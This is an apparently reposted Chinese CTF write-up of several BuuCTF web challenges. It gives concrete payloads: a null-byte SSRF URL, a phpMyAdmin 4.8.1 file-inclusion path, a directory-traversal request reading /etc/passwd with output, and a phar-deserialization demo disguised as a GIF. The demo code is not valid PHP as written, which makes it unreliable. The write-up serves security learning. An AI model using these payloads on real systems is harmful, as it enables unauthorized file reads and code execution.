BuuCTF Web Writeup 第三部分

Posted 0d4y

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BuuCTF Web Writeup 第三部分相关的知识,希望对你有一定的参考价值。

[GKCTF2020]cve版签到

题目提示

cve-2020-7066
Hint: Flag in localhost
Tips: Host must be end with ‘123‘
You just view *.ctfhub.com 

题目原型

#79329 get_headers() silently truncates after a null byte

This was tested on php 7.3, but the function has always had this bug.

The test script shows that this can cause well-written scripts to get headers for an unexpected domain. Those headers could leak sensitive information or unexpectedly contain attacker-controlled data.

解题方法

?url=http://127.0.0.123%00.ctfhub.com

收集信息

善用php bug搜索漏洞

(未完成)[安洵杯 2019]easy_web

[GWCTF 2019]我有一个数据库

解题方法

扫描后发现存在/phpmyadmin/,访问后得知版本信息 4.8.1

phpmyadmin 4.8.1存在文件包含漏洞,构造?target=db_datadict.php%253f/../../../../../../../../../flag

(未完成)[BJDCTF2020]Mark loves cat

(未完成)[CISCN2019 华北赛区 Day1 Web1]Dropbox

上传测试后发现只能上传图片类型文件

抓包

POST /download.php HTTP/1.1
...
Cookie: PHPSESSID=94b78b93ffa19e6bc6d07e0da5307548
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=%E5%9B%BE%E7%89%87%E9%A9%AC.png

放包之后会显示文件内容

目录穿越

filename=../../../../../etc/passwd

显示结果

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
...
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin

题目中的主要文件

.
├── class.php
├── delete.php
├── download.php
├── index.php
├── login.php
└── register.php

class.php是核心文件

class.php(简化)

<?php

class User {
    public $db;

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        ...
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

File类中的close()方法存在RCE vulnerability

Q: 如何利用RCE vulnerability?

代码中并不 unserialize(),但存在文件上传点

Attack PHP Deserialization Vulnerability via Phar

the Phar File Structure

0x00 A Stub

It can be interpreted as a flag and the format is xxx<?php xxx; __HALT_COMPILER();?>.The front content is not limited, but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize this file as a phar file.

0x01 A Manitest Describing the Contents

A phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.

0x02 The File Contents

It is the contents of compressed file.

0x03 A signature for verifying Phar integrity

phar file format only

Demo

Construct a phar file according to the file structure, and PHP has a built-in class to handle related operations

Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.

class Demo {
  @unlink("phar.phar");
  $phar = new Phar("phar.phar"); // suffix must be phar
  $phar->startBuffering();
  $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif
  $o = new file();
  $o->output = "phpinfo();";
  $phar->setMetadata($o); // store custom meta-data in manifest
  $phar->addFromString("test.txt", "test"); // compressed file
  $phar->stopBuffering(); // automatic computation of signature
};

以上是关于BuuCTF Web Writeup 第三部分的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF [GWCTF 2019]pyre WriteUp

BUUCTF-PWN-Writeup-1-5

BUUCTF-PWN-Writeup-1-5

BUUCTF 不一样的flag writeup

BUUCTF-PWN-Writeup-1-5

buuctf之admin writeup